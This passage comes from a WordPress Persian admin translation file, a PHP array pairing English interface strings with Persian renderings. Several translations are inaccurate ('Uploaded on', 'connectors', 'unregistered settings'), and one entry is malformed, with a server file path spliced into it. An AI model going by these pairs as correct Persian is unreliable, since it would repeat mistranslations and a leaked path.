WordPress.org stats page.'=>'این داده‌ها جهت ارائه پیشرفت عمومی به وردپرس استفاده شده‌اند، که شامل کمک کردن به محافظت از سایت شما با پیداکردن و نصب خودکار به‌روزرسانی‌های جدید، است. آن همچنین جهت محاسبه آمار، مانند آنهایی که در صفحه آمار وردپرس نمایش داده‌شده است، مورد استفاده قرار می‌گیرد.','There is no need to change your CSS here — you can edit and live preview CSS changes in the built-in CSS editor.'=>'نیازی به تغییر CSS تان در اینجا نیست — شما می‌توانید آن را ویرایش و تغییرات CSS را به صورت زنده در ویرایشگر توکار CSS پیش‌نمایش نمایید.','Did you know?'=>'آیا می‌دانستید؟','Noteworthy Contributors'=>'مشارکت کنندگان قابل توجه','If you decide to go ahead with direct edits anyway, use a file manager to create a copy with a new name and hang on to the original. That way, you can re-enable a functional version if something goes wrong.'=>'اگر شما تصمیم گرفته‌اید به هر حال با ویرایش مستقیم پیش بروید، از یک نرم افزار مدیریت پرونده برای ساخت یک کپی، با نام جدید استفاده کنید و آن را با پرونده اصلی جایگزین کنید. با این کار، اگر مشکلی پیش آمد می‌توانید پرونده اصلی را استفاده کنید.','If you absolutely have to make direct edits to this plugin, use a file manager to create a copy with a new name and hang on to the original. That way, you can re-enable a functional version if something goes wrong.'=>'در صورتی که کاملا مجبور به ویرایش مستقیم این افزونه هستید، از یک مدیریت فایل برای ایجاد یک کپی با نام جدید استفاده نمایید و آنگاه روی اصل آن انجام دهید. از آن طریق، می‌توانید یک نگارش عملیاتی را در صورتی که خراب شد، دوباره فعال نمایید.','You appear to be making direct edits to your plugin in the WordPress dashboard. Editing plugins directly is not recommended as it may introduce incompatibilities that break your site and your changes may be lost in future updates.'=>'به نظر می‌رسد که در حال ویرایش مستقیم افزونه‌تان در پیشخوان وردپرس هستید. توصیه می‌کنیم که افزونه‌ها را مستقیم ویرایش نکنید، زیرا ممکن است ناسازگاری که سایت شما را مختل کند، نشان داده شود و تغییرات شما ممکن است در به‌روزرسانی‌های آینده از دست برود.','WordPress is not notifying any Update Services because of your site’s visibility settings.'=>'وردپرس هیچ سرویس به‌روزرسانی را، به دلیل تنظیمات دیداری سایت‌تان، اطلاع‌رسانی نمی‌کند.','Error: The root directory of your site is not writable, so creating a file automatically was not possible. This is the URL rewrite rule you should have in your %2$s file. Create a new file called %2$s in the root directory of your site. Click in the field and press %3$s (or %4$s on Mac) to select all. Then insert this code into the %2$s file.'=>'خطا: در صورتی که فهرست ریشه سایت‌تان قابل نوشتن بود، می‌توانستیم این کار را به صورت خودکار انجام دهیم، اما اینطور نیست، بنابراین این دستور url rewrite‌ی است که شما باید در فایل %2$s خود داشته باشید. یک فایل جدید ایجاد کنید، آن را در فهرست ریشه سایت خود، %2$s نام گذاری کنید. در زمینه کلیک نمایید و %3$s را جهت انتخاب همه فشار دهید. (در مک %4$s) سپس این کد را در داخل فایل %2$s درج نمایید.','Enter the same address here unless you want your site home page to be different from your WordPress installation directory.'=>'اگر می‌خواهید صفحه اصلی سایت از پوشه نصب وردپرس متفاوت باشد آدرس را اینجا وارد کنید.','https://wordpress.org/about/license/'=>'https://wordpress.org/about/license/','From time to time, your WordPress site may send data to WordPress.org — including, but not limited to — the version you are using, and a list of installed plugins and themes.'=>'گاه به گاه، سایت وردپرس شما ممکن است داده‌هایی را به WordPress.org ارسال کند — شامل، اما نه محدود به — نسخه وردپرسی که شما در حال استفاده می‌باشید، و لیستی از افزونه‌ها و پوسته‌های نصب شده.','Uploaded on: %s'=>'به روزرسانی شده در: %s','Downloading installation package from %s…'=>'درحال دریافت بسته نصبی از %s…','Downloading translation from %s…'=>'در حال دریافت ترجمه از %s…','Downloading update from %s…'=>'درحال دریافت به‌روزرسانی از %s…','Likely direct inclusion of %1$s in order to use %2$s. This is very wrong. Hook the %2$s call into the %3$s action instead.'=>'Likely direct inclusion of %1$s in order to use %2$s. This is very wrong. Hook the %2$s call into the %3$s action instead.','Customization Draft'=>'پیش‌نویس سفارشی','This draft comes from your unpublished customization changes. You can edit, but there is no need to publish now. It will be published automatically with those changes.'=>'این پیش‌نویس از تغییرات سفارشی منتشر نشده شما می‌آید. شما می‌توانید ویرایش نمایید، اما اکنون نیازی به انتشار نیست. این به طور خودکار با آن تغییرات منتشر خواهد شد.','Theme Files'=>'پرونده‌های پوسته','folder'=>'پوشه','Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.'=>'قادر به برقراری ارتباط با سایت برای بررسی خطاهای مهلک نمی‌باشیم، بنابراین تغییر PHP برگشت داده شد. شما بایستی تغییر فایل PHP خود را با استفاده از ابزارهای دیگر مانند استفاده از SFTP آپلود نمایید.','Installation Required'=>'نصب لازم است','Could not fully remove the plugin %s.'=>'نمی‌توان افزونه %s را بطور کامل حذف کرد.','User has been created, but could not be added to this site.'=>'کاربر ایجاد شده است، اما نمی‌تواند به سایت اضافه شود.','That user could not be added to this site.'=>'این کاربر نمی‌تواند به سایت اضافه شود.','Disable syntax highlighting when editing code'=>'هنگام ویرایش کد، برجسته کردن نحوی را غیر‌فعال کنید.','Syntax Highlighting'=>'نحو برجسته','Run the installation'=>'راه اندازی نصب','https://wordpress.org/about/privacy/'=>'https://wordpress.org/about/privacy/','Press This is not available. Please contact your site administrator.'=>'این مطبوعات در دسترس نیست. لطفا با مدیریت سایت خود تماس بگیرید.','Press This is not installed. Please install Press This from the main site.'=>'مطبوعات این نصب نشده است. لطفا این مطبوعات را از سایت اصلی نصب نمایید.','Activate Press This'=>'فعال کردن این مطبوعات','I understand'=>'فهمیدم','Heads up!'=>'مراقب باشید!','Warning: Making changes to active plugins is not recommended.'=>'اخطار: اعمال تغییرات روی افزونه فعال توصیه نمی‌شود.','Selected file content:'=>'محتوای انتخاب شده پرونده: ','There was an error while trying to update the file. You may need to fix something and try updating again.'=>'هنگام انجام به‌روزرسانی پرونده خطایی روی داد. ممکن است لازم باشد چیزی را رفع کنید و دوباره به روزرسانی کنید.','Homepage: %s'=>'صفحه نخست: %s','Available tags:'=>'برچسب‌های موجود: ','%s (already used in permalink structure)'=>'%s (هم‌اکنون در ساختار پیوندهای یکتا استفاده شده)','%s added to permalink structure'=>'%s اضافه شده به ساختار پیوند یکتا','%s (A sanitized version of the author name.)'=>'%s (یک نگارش تصفیه‌شده (sanitized) از نام نویسنده.)','%s (Category slug. Nested sub-categories appear as nested directories in the URL.)'=>'%s (نامک دسته. زیردسته‌های تودرتو به عنوان فهرست‌های تودرتو در URL نمایان می‌شوند.)','%s (The sanitized post title (slug).)'=>'%s (عنوان نوشته تصفیه‌شده (نامک).)','%s (The unique ID of the post, for example 423.)'=>'%s (شناسه منحصر به فرد نوشته، به عنوان مثال 423.)','%s (Second of the minute, for example 33.)'=>'%s (ثانیهٔ دقیقه، برای نمونه ۳۳.)','%s (Minute of the hour, for example 43.)'=>'%s (دقیقهٔ ساعت، برای نمونه ۴۳.)','%s (Hour of the day, for example 15.)'=>'%s (ساعتِ روز، برای مثال ۱۵.)','%s (Day of the month, for example 28.)'=>'%s (روزِ ماه، برای مثال ۲۸.)','%s (Month of the year, for example 05.)'=>'%s (ماهِ سال، برای مثال ۰۵.)','%s (The year of the post, four digits, for example 2004.)'=>'%s (سال نوشته، چهار رقمی، برای مثال ۲۰۰۴.)','Theme Installation'=>'نصب پوسته','%s is currently editing this post.'=>'%s در حال حاضر این نوشته را ویرایش می‌کند.','%s is currently editing this post. Do you want to take over?'=>'%s در حال حاضر در حال ویرایش این نوشته است. مایل به در دست گرفتن هستید؟','Custom installation script.'=>'اسکریپت نصب سفارشی.','Active Installations:'=>'نصب‌های فعال:','Plugin Installation'=>'نصب افزونه','Settings — This page shows a list of all settings associated with this site. Some are created by WordPress and others are created by plugins you activate. Note that some fields are grayed out and say Serialized Data. You cannot modify these values due to the way the setting is stored in the database.'=>'تنظیمات — این صفحه لیستی از تمام تنظیمات مربوط به این سایت را نشان می‌دهد. بعضی‌ها توسط وردپرس ایجاد شده‌اند و دیگر موارد توسط افزونه‌هایی که فعال می‌نمایید، ایجاد شده‌اند. توجه داشته باشید که برخی از فیلدها به رنگ خاکستری هستند و اعلام‌گر داده‌های سریالی هستند. شما نمی‌توانید این مقادیر را اصلاح نمایید به دلیل روشی که تنظیمات در پایگاه داده ذخیره می‌شوند.','Themes — This area shows themes that are not already enabled across the network. Enabling a theme in this menu makes it accessible to this site. It does not activate the theme, but allows it to show in the site’s Appearance menu. To enable a theme for the entire network, see the Network Themes screen.'=>'پوسته‌ها — این ناحیه، پوسته‌هایی را نشان می‌دهد که هنوز در سراسر شبکه فعال نشده‌اند. فعال کردن یک پوسته در این فهرست، آن را قابل دستیابی در این سایت می‌کند. این کار پوسته را فعال نمی‌کند، اما به آن اجازه می‌دهد تا در فهرست نمایش سایت، نشان داده شود. برای فعال کردن یک پوسته برای سراسر شبکه، صفحه پوسته‌های شبکه را مشاهده نمایید.','Users — This displays the users associated with this site. You can also change their role, reset their password, or remove them from the site. Removing the user from the site does not remove the user from the network.'=>'کاربران — این، کاربران مرتبط با این سایت را نمایش می‌دهد. شما همچنین می‌توانید نقش آنها را تغییر دهید، گذرواژه آنها را بازنشانی کنید، یا آنها را از سایت حذف کنید. حذف کاربر از سایت، کاربر را از شبکه حذف نمی‌کند.','Info — The site URL is rarely edited as this can cause the site to not work properly. The Registered date and Last Updated date are displayed. Network admins can mark a site as archived, spam, deleted and mature, to remove from public listings or disable.'=>'اطلاعات — URL سایت به ندرت ویرایش می‌شود، زیرا ممکن است منجر به این شود که سایت به درستی کار نکند. تاریخ عضویت و تاریخ آخرین به‌روزرسانی نمایش داده شده‌اند. مدیران شبکه می‌توانند یک سایت را به عنوان بایگانی شده، هرزنامه، حذف شده و کامل، به منظور حذف از لیست‌های عمومی و یا غیرفعال کردن، علامت گذاری کنند.','The menu is for editing information specific to individual sites, particularly if the admin area of a site is unavailable.'=>'فهرست برای ویرایش اطلاعات مخصوص به سایت‌های منحصربه فرد است، مخصوصاً اگر ناحیه مدیریت یک سایت در دسترس نیست.','Unable to write to file.'=>'قادر به نوشتن در پرونده نیست.','Your PHP code changes were not applied due to an error on line %1$s of file %2$s. Please fix and try saving again.'=>'تغییرات کد PHP شما، به دلیل یک خطا در خط %1$s از فایل %2$s بازگردانده شد. لطفا اصلاح نمایید و دوباره سعی کنید که ذخیره نمایید.','Events and News dashboard widgethttps://wordpress.org/news/'=>'https://fa.wordpress.org/news/','Your Recent Drafts'=>'پیش‌نویس‌‌های اخیر شما','nameUnknown'=>'ناشناخته','View posts by %s'=>'مشاهده نوشته‌ها توسط %s','No description'=>'بدون توضیحات','%s Active Installations'=>'%s نصب‌ فعال','Theme installation failed.'=>'نصب پوسته با خطا مواجه شد.','Plugin installation failed.'=>'نصب افزونه با خطا مواجه شد.','Activate Plugin & Go to Press This'=>'افزونه را فعال نمایید و به "انتشار این" بروید','Your scheduled changes just published'=>'تغییرات برنامه ریزی شده شما فقط منتشر شد','themeActivate'=>'فعال کردن','Allow link notifications from other blogs (pingbacks and trackbacks) on new posts'=>'اجازه دادن به دیگر وبلاگ‌ها برای آگاه‌سازی پیوندی (بازتاب‌ها و دنبالک‌ها) روی نوشته‌های تازه.','pluginNetwork Activate %s'=>'%s را در شبکه فعال نمایید','pluginActivate %s'=>'%s را فعال نمایید','No media files found.'=>'هیچ پروندهٔ رسانه‌ای پیدا نشد.','Run Importer'=>'اجرای درون‌ریز','Run %s'=>'اجرا %s','comment statusOpen'=>'باز','Image Rotation'=>'چرخش تصویر','There are no events scheduled near you at the moment. Would you like to organize a WordPress event?'=>'در حال حاضر هیچ رویدادی نزدیک شما برنامه‌ریزی نشده است. آیا می‌خواهید یک رویداد وردپرسی را برنامه ریزی کنید؟','Edit User %s'=>'ویرایش کاربر %s','Edit widget: %s'=>'ویرایش ابزارک: %s','https://make.wordpress.org/community/handbook/meetup-organizer/welcome/'=>'https://make.wordpress.org/community/handbook/meetup-organizer/welcome/','There are no events scheduled near %1$s at the moment. Would you like to organize a WordPress event?'=>'در حال حاضر هیچ رویدادی نزدیک %1$s برنامه‌ریزی نشده است. آیا می‌خواهید یک رویداد وردپرسی را برنامه ریزی کنید؟ ','Attend an upcoming event near %s.'=>'در رویدادهای نزدیک %s شرکت کنید.','Cincinnati'=>'تهران','City:'=>'شهر:','WordCamps'=>'وردکمپ‌ها','Meetups'=>'همایش‌ها','An error occurred. Please try again.'=>'خطایی رخ داده است. لطفاً دوباره تلاش کنید.','WordPress Events and News'=>'اخبار و رویدادهای وردپرس','l, M j, Y'=>'l, M j, Y','Unknown API error.'=>'خطای نامشخص API','Invalid API response code (%d).'=>'کد پاسخ API نامعتبر است (%d).','Sorry, you are not allowed to delete users.'=>'با عرض پوزش، شما مجاز به حذف کاربران نمی‌باشید.','Sorry, you are not allowed to create users.'=>'با عرض پوزش، شما اجازه ساخت حساب‌های کاربری را ندارید.','short (~12 characters) label for hide controls buttonHide Controls'=>'پنهان کردن کنترل‌ها','Expand Sidebar'=>'گسترش نوارکناری','ID #%1$s: %2$s Sorry, you are not allowed to remove this user.'=>'شناسه #%1$s: %2$s با عرض پوزش، شما اجازه پاک کردن این کاربر را ندارید.','You can select the language you wish to use while using the WordPress administration screen without affecting the language site visitors see.'=>'می‌توانید زبان بخش مدیریت وردپرس را تغییر دهید، بدون این‌که بر روی زبان اصلی سایت -که مخاطبین سایت مشاهده می‌کنند- تاثیر بگذارد.','Edit Filters'=>'ویرایش صافی‌ها','Clear current filters'=>'پاکسازی صافی‌های موجود','Select one or more Theme features to filter by'=>'یک یا چند ویژگی پوسته را برای صافی کردن انتخاب کنید','(%s ratings)'=>'(%s امتیاز)','Current Background Image'=>'تصویر پس‌زمینه کنونی','Current Header Image'=>'تصویر سربرگ کنونی','Set status'=>'تعیین وضعیت','“%s” is locked'=>'“%s” قفل است','Active plugin installationsLess Than 10'=>'کمتر از ۱۰','Sorry, you are not allowed to attach files to this post.'=>'با عرض پوزش، شما مجاز نیستید به این نوشته پرونده‌ای پیوست کنید.','https://wordpress.org/plugins/'=>'https://fa.wordpress.org/plugins/','The Customizer allows you to preview changes to your site before publishing them. You can navigate to different pages on your site within the preview. Edit shortcuts are shown for some editable elements. The Customizer is intended for use with non-block themes.'=>'سفارشی‌ساز به شما اجازه می‌دهد که پیش از انتشار، پیش‌نمایش تغییراتی را که بر سایت خود اعمال کرده‌اید را ببینید. شما در پیش‌نمایش می‌توانید به برگه‌های مختلف سایت خود بروید. میان‌برهای ویرایش برای برخی از عناصر قابل ویرایش نشان داده شده‌اند. سفارشی‌ساز برای استفاده پوسته‌هایی که بر پایه بلاک نیستند اختصاص یافته است.','Customize New Changes'=>'سفارشی‌سازی تغییرات جدید','Background ScrollScroll'=>'پیمایش','Background RepeatRepeat'=>'تکرار','%1$s of %2$s'=>'%1$s از %2$s','You can find new plugins to install by searching or browsing the directory right here in your own Plugins section.'=>'می‌توانید افزونه‌های تازه را با جستجو در بخش افزونه‌ها پیدا و نصب کنید.','Plugins hook into WordPress to extend its functionality with custom features. Plugins are developed independently from the core WordPress application by thousands of developers all over the world. All plugins in the official WordPress Plugin Directory are compatible with the license WordPress uses.'=>'افزونه‌ها با امکانات گوناگون به وردپرس اضافه می‌شوند تا توانایی‌های آن را افزایش دهند. افزونه‌ها توسط هزاران برنامه‌نویسان مستقل از گروه توسعهٔ وردپرس در سراسر دنیا نوشته می‌شوند. همهٔ افزونه‌های موجود در مخزن افزونه‌های وردپرس با پروانه‌ای که وردپرس استفاده می‌کند سازگار هستند.','Search plugins by:'=>'جستجوی افزونه‌ها به‌وسیله:','Import posts, pages, comments, custom fields, categories, and tags from a WordPress export file.'=>'درون‌ریزی نوشته‌ها، برگه‌ها، دیدگاه‌ها، زمینه‌های دلخواه، دسته‌ها و برچسب‌ها از پروندهٔ برون‌بری وردپرس.','Import posts & media from Tumblr using their API.'=>'درون‌ریزی نوشته‌ها و رسانه‌ها از Tumblr با استفاده از API آنها. ','Import posts from an RSS feed.'=>'درون‌ریزی نوشته‌ها از خوراک RSS.','Import posts and comments from a Movable Type or TypePad blog.'=>'درون‌ریزی نوشته‌ها و دیدگاه‌ها از سیستم Movable Type یا TypePad','Import posts from LiveJournal using their API.'=>'درون‌ریزی نوشته‌ها از LiveJournal با استفاده از API آنها.','Convert existing categories to tags or tags to categories, selectively.'=>'تبدیل دسته‌های موجود به برچسب و یا بالعکس با انتخاب شما.','Import posts, comments, and users from a Blogger blog.'=>'درون‌ریزی نوشته‌ها و کاربران از وبلاگ Blogger شما.','pluginDeactivate %s'=>'غیر فعال کردن %s','pluginDelete %s'=>'پاک کردن %s','pluginNetwork Deactivate %s'=>'غیر فعال کردن %s در شبکه','By default, new users will receive an email letting them know they’ve been added as a user for your site. This email will also contain a password reset link. Uncheck the box if you do not want to send the new user a welcome email.'=>'به‌صورت پیش‌فرض، کاربران تازه ایمیلی دریافت می‌کنند که به آن‌ها اطلاع می‌دهد به سایت شما پیوسته‌اند. این ایمیل همچنین شامل پیوندی برای بازگردانی رمز است. اگر نمی‌خواهید کاربران تازه چنین ایمیل را دریافت کنند، تیک مربوطه را بردارید.','New users are automatically assigned a password, which they can change after logging in. You can view or edit the assigned password by clicking the Show Password button. The username cannot be changed once the user has been added.'=>'کاربران تازه به صورت خودکار رمزی دریافت خواهند کرد که بعداً می‌توانند آن را تغییر دهند. می‌توانید با کلیک روی دکمهٔ نمایش رمز عبور، رمز عبور را ببینید یا ویرایش کنید. هنگامی که کاربر به سایت افزوده شد، نام‌کاربری غیر قابل تغییر خواهد بود.','plugin%s was successfully deleted.'=>'%s با موفقیت پاک شد.','The search for installed plugins will search for terms in their name, description, or author.'=>'جستجو برای افزونه‌های نصب شده، با استفاده از عبارتی در نام، توضیحات یا نویسندهٔ افزونه انجام می‌شود.','Custom Logo'=>'نشان سفارشی','Sorry, you are not allowed to remove users.'=>'با عرض پوزش، شما مجاز به پاک کردن کاربران نمی‌باشید.','Sorry, you are not allowed to add users to this network.'=>'با عرض پوزش، شما اجازهٔ افزودن کاربر به این شبکه را ندارید.','Sorry, you are not allowed to edit this changeset.'=>'با عرض پوزش، شما اجازه ویرایش این تغییرات را ندارید.','Sorry, you are not allowed to update themes for this site.'=>'با عرض پوزش، شما مجاز به به‌روزرسانی پوسته‌های این سایت نمی‌باشید. ','Sorry, you are not allowed to update this site.'=>'با عرض پوزش، شما مجاز به به‌روزرسانی این سایت نیستید.','New version available. '=>'نگارش تازه در دسترس است. ','The Theme Installer screen requires JavaScript.'=>'صفحهٔ راه‌انداز پوسته به جاواسکریپت نیاز دارد.','Sorry, you are not allowed to edit templates for this site.'=>'با عرض پوزش، شما اجازهٔ ویرایش قالب‌های این سایت را ندارید.','Error: "Table Prefix" is invalid.'=>'خطا: "پیشوند جدول" نامعتبر است.','Sorry, you are not allowed to deactivate plugins for this site.'=>'با عرض پوزش، شما اجازهٔ غیر فعال کردن افزونه‌ها برای این سایت را ندارید.','Sorry, you are not allowed to activate plugins for this site.'=>'با عرض پوزش، شما اجازهٔ فعال کردن افزونه‌ها برای این سایت را ندارید.','Sorry, you are not allowed to edit plugins for this site.'=>'با عرض پوزش، شما اجازهٔ ویرایش افزونه‌های این سایت را ندارید.','Sorry, you are not allowed to modify unregistered settings for this site.'=>'با عرض پوزش، شما اجازه‌ی تغییر تنظیمات کاربران میهمان برای این سایت را ندارید.','Sorry, you are not allowed to manage options for this site.'=>'با عرض پوزش، شما اجازهٔ تغییر تنظیمات و گزینه‌های این سایت را ندارید.','Manage with Live Preview'=>'مدیریت با پیش‌نمایش زنده','Sorry, you are not allowed to delete this site.'=>'با عرض پوزش، شما اجازهٔ پاک کردن این سایت را ندارید.','Sorry, you are not allowed to add links to this site.'=>'با عرض پوزش، شما اجازهٔ افزودن پیوند به این سایت را ندارید.','Hi, this is a comment. /home/filetir/public_html/wp-content/languages/admin-fa_IR.l10n.php:تصاویر نویسندگان دیدگاه از Gravatar گرفته می‌شود.','theme%s was successfully deleted.'=>'%s با موفقیت پاک شد.','WordPress %2$s is available! Please notify the site administrator.'=>'وردپرس %2$s در دسترس است، لطفا مدیر سایت را باخبر کنید.','Please update WordPress now'=>'لطفاً هم‌اکنون وردپرس را به‌روزرسانی نمایید','WordPress %2$s is available! Please update now.'=>'وردپرس %2$s دردسترس است! لطفا هم‌اکنون به‌روزرسانی نمایید.','Portfolio'=>'نمونه‌کار','Photography'=>'عکاسی','News'=>'اخبار','Food & Drink'=>'غذا و نوشیدنی','Entertainment'=>'سرگرمی','Education'=>'آموزشی','E-Commerce'=>'تجارت الکترونیک','Blog'=>'بلاگ','Footer Widgets'=>'ابزارک‌های پابرگ','Grid Layout'=>'طرح شبکه‌ای','This will replace the current editor content with the last backup version. You can use undo and redo in the editor to get the old content back or to return to the restored version.'=>'این کار محتوای کنونی ویرایشگر را با آخرین نسخهٔ ذخیره‌شده جایگزین می‌کند. می‌توانید از دکمه‌های بازگردانی/بازانجام برای بازگرداندن محتوای پیشین یا استفاده از محتوای تازه استفاده کنید.','Close media attachment panel'=>'بستن بخش پیوست رسانه','Info'=>'اطلاعات','Need help? Use the Help tab above the screen title.'=>'به کمک نیاز دارید؟ از زبانهٔ راهنما در بالای صفحه استفاده کنید.','Sorry, you are not allowed to access this page.'=>'با عرض پوزش، شما اجازهٔ دسترسی به این برگه را ندارید.','Embed Footer Template'=>'جاسازی قالب پابرگ','Embed Header Template'=>'جاسازی قالب سربرگ','Embed Content Template'=>'جاسازی قالب محتوا','Embed 404 Template'=>'جاسازی قالب خطای ۴۰۴','Embed Template'=>'جاسازی قالب','pluginActive'=>'فعال','(Private post)'=>'(نوشته خصوصی)','Sorry, you are not allowed to edit the links for this site.'=>'با عرض پوزش، شما اجازهٔ ویرایش پیوندهای این سایت را ندارید.','Sorry, you are not allowed to manage privacy options on this site.'=>'با عرض پوزش، شما مجاز به مدیریت حریم خصوصی در این سایت نمی‌باشید.','Sorry, you are not allowed to manage connectors on this site.'=>'با عرض پوزش، شما اجازهٔ مدیریت افزونه‌های این سایت را ندارید.','Plugin could not be deleted.'=>'افزونه نمیتواند پاک شود.','Sorry, you are not allowed to update plugins for this site.'=>'با عرض پوزش، شما مجاز به به‌روزرسانی افزونه‌ها برای این سایت نیستید.','Sorry, you are not allowed to activate plugins on this site.'=>'با عرض پوزش، شما اجازهٔ نصب افزونه‌ها در این سایت را ندارید.','Theme could not be deleted.'=>'پوسته نمی‌تواند پاک شود.','Sorry, you are not allowed to delete themes on this site.'=>'با عرض پوزش، شما اجازهٔ پاک کردن پوسته‌های این سایت را ندارید.','Sorry, you are not allowed to install themes on this site.'=>'با عرض پوزش، شما اجازهٔ نصب پوسته‌ها در این سایت را ندارید.','No theme specified.'=>'پوسته‌ای مشخص نشده.','Sorry, you are not allowed to import content into this site.'=>'با عرض پوزش، شما مجاز به درون‌ریزی محتوا در این سایت نیستید.','Sorry, you are not allowed to export the content of this site.'=>'با عرض پوزش، شما اجازهٔ برون‌بری محتوای این سایت را ندارید.','You can filter the list of posts by post status using the text links above the posts list to only show posts with that status. The default view is to show all posts.'=>'می‌توانید فهرست نوشته‌ها را با استفاده از پیوندهای بالای فهرست، پالایش کنید تا تنها نوشته‌هایی با وضعیت موردنظر شما را نمایش دهد. حالت پیش‌فرض، نمایش همهٔ نوشته‌هاست.','Close the Customizer and go back to the previous page'=>'بستن سفارشی‌ساز و بازگشت به صفحهٔ قبلی.','Sorry, you are not allowed to customize headers.'=>'با عرض پوزش، شما اجازهٔ سفارشی‌سازی سربرگ‌ها را ندارید.','Release Deputy'=>'معاون این انتشار','Release Design Lead'=>'سرپرست طراحی این نگارش','Custom fields can be used to add extra metadata to a post that you can use in your theme.'=>'زمینه‌های دلخواه برای افزودن داده‌های جانبی به نوشته به کار می‌روند. شما می‌توانید از این داده‌ها در پوسته سایت خود استفاده نمایید..','Trackbacks are a way to notify legacy blog systems that you’ve linked to them. If you link other WordPress sites, they’ll be notified automatically using pingbacks, no other action necessary.'=>'بازتاب‌ها راهی برای باخبر کردن نرم افزارهای قدیمی‌تر وبلاگ‌نویسی هستند، در مورد این که شما به آن‌ها در نوشته خود پیوند داده اید، . اگر شما به سایت‌های وردپرسی ارجاع می‌دهید،‌ آنها به صورت خودکار توسط پینگ از این کار شما باخبر می‌شوند، نیاز به کار دیگری نیست.','Excerpts are optional hand-crafted summaries of your content that can be used in your theme. Learn more about manual excerpts.'=>'چکیده‌ها، خلاصه‌ای اختیاری از نوشته شماست، می‌توانید از آن در پوستهٔ سایت خود استفاده کنید. دربارهٔ چکیده‌ها بیشتر بخوانید.','The Code mode allows you to enter HTML along with your post text. Note that <p> and <br> tags are converted to line breaks when switching to the Code editor to make it less cluttered. When you type, a single line break can be used instead of typing <br>, and two line breaks instead of paragraph tags. The line breaks are converted back to tags automatically.'=>'حالت کد به شما اجازه می‌دهد تا HTML را همراه با متن نوشته خود وارد نمایید. توجه داشته باشید که تگ‌های <p> و <br> هنگام سوئیچ به ویرایشگر کد به خطوط جدید تبدیل می‌شوند تا صفحه کمتر شلوغ باشد. هنگام تایپ کردن، می‌توانید از یک خط جدید به جای تایپ کردن <br>, استفاده نمایید و دو خط جدید به جای تگ‌های پاراگراف، خطوط جدید به‌طور خودکار به تگ‌ها تبدیل می‌شوند.','Visual mode gives you an editor that is similar to a word processor. Click the Toolbar Toggle button to get a second row of controls.'=>'حالت دیداری به شما ویرایشگری ارائه می‌کند که بسیار شبیه به نرم‌افزارهای پردازش متون است. بر روی دکمه ضامن نوار ابزار کلیک کنید تا ردیف بعدی ابزارهای ویرایش نوشته به نمایش درآیند.','Error saving media file.'=>'خطا در ذخیرهٔ پروندهٔ رسانه‌ای.','%s media file restored from the Trash.'=>'%s پروندهٔ رسانه‌ای از زباله‌دان بازیابی شد.','%s media file moved to the Trash.'=>'%s پروندهٔ رسانه‌ای به زباله‌دان انتقال یافت.','%s media file permanently deleted.'=>'%s پروندهٔ رسانه‌ای برای همیشه پاک شد.','%s media file detached.'=>'%s پروندهٔ رسانه‌ای جدا شد.','Media file detached.'=>'پروندهٔ رسانه‌ای جدا شد.','%s media file attached.'=>'%s پروندهٔ رسانه‌‌ای پیوست شد.','Media file attached.'=>'پروندهٔ رسانه‌ای پیوست شد.','Media file updated.'=>'پرونده رسانه به‌روزرسانی شد.','View %1$s version %2$s details'=>'نمایش جزئیات %1$s نگارش %2$s','dashboard%1$s, %2$s'=>'%1$s، %2$s','Publish — You can set the terms of publishing your post in the Publish box. For Status, Visibility, and Publish (immediately), click on the Edit link to reveal more options. Visibility includes options for password-protecting a post or making it stay at the top of your blog indefinitely (sticky). The Password protected option allows you to set an arbitrary password for each post. The Private option hides the post from everyone except editors and administrators. Publish (immediately) allows you to set a future or past date and time, so you can schedule a post to be published in the future or backdate a post.'=>'انتشار — می‌توانید شرایط انتشار نوشتهٔ خود را، در جعبه انتشار تنظیم کنید. برای وضعیت، نمایانی و انتشار (فوری)، روی پیوند ویرایش، جهت نمایش تنظیمات بیشتر کلیک کنید. نمایانی شامل تنظیماتی برای رمزدار کردن نوشته یا قرار دادن آن در بالای بلاگ (به صورت سنجاق‌شده) است. انتشار (فوری) به شما اجازه تنظیم تاریخ و زمان گذشته و آینده را می‌دهد. می‌توانید تاریخ انتشار یک نوشته را برای آینده تنظیم کرده یا تاریخ انتشار آن را به قبل برگردانید. گزینه رمزدار کردن، نوشته را از دید همه به جز ویرایشگران و مدیران سایت مخفی می‌سازد.','There is a pending change of your email to %s.'=>'ایمیل شما منتظر تایید برای تغییر به %s است.','Error while saving the new email address. Please try again.'=>'خطا در ذخیره ایمیل تازه. دوباره تلاش کنید.','You can narrow the list by file type/status or by date using the dropdown menus above the media table.'=>'می‌توانید لیست را بر اساس نوع پرونده‌ها و وضعیت آنها، با استفاده از پیوندهای بالای صفحه نمایش مرتب/جزیی‌تر کنید. همچنین می‌توانید لیست را بر اساس تاریخ و با استفاده از صافی بالای آن بازچینی و مرتب کنید.','The following themes are installed but incomplete.'=>'پوسته‌های زیر نصب شده‌اند اما ناقص.','New theme activated.'=>'پوستهٔ تازه فعال شد.','Settings saved and theme activated.'=>'تنظیمات ذخیره و پوسته فعال شد.','https://wordpress.org/themes/'=>'https://fa.wordpress.org/themes/','Sorry, you are not allowed to delete that user.'=>'با عرض پوزش، شما اجازه حذف این کاربر را ندارید.','Your database password.'=>'رمز پایگاه‌داده شما.','Your database username.'=>'نام کاربری پایگاه‌دادهٔ شما.','The name of the database you want to use with WordPress.'=>'نام پایگاه داده‌ای که می‌خواهید برای وردپرس استفاده کنید.','plugin%1$s by %2$s'=>'%1$s توسط %2$s','%1$s by %2$s (will also delete its data)'=>'%1$s توسط %2$s (همچنین اطلاعاتش را هم پاک می‌کند)','There is a pending change of the admin email to %s.'=>'یک درخواست تغییر ایمیل مدیر به %s فرستاده شده است.','WordPress has been installed. Thank you, and enjoy!'=>'وردپرس فارسی نصب شد. با سپاس از شما، لذت ببرید!','The constant %s cannot be defined when installing WordPress.'=>'ثابت %s نمی‌تواند هنگام نصب وردپرس تعریف شود.','Your %s file has an empty database table prefix, which is not supported.'=>'پروندهٔ %s شما دارای یک پیشوند خالی برای جدول پایگاه‌داده است که پشتیبانی نمی‌شود.','Dismiss the welcome panel'=>'نادیده گرفتن کادر خوش‌آمدگویی','Theme zip file'=>'پروندهٔ فشردهٔ پوسته','Attach to existing content'=>'پیوست کردن به محتوای موجود','Click the image to edit or update'=>'برای ویرایش یا به‌روزرسانی روی تصویر کلیک نمایید','Reviews with %1$d star: %2$s. Opens in a new tab.'=>'بررسی‌هایی با %1$d ستاره: %2$s. در یک زبانهٔ جدید باز می‌شوند.','Read all reviews on WordPress.org or write your own!'=>'همه بررسی‌ها را در WordPress.org بخوانید یا 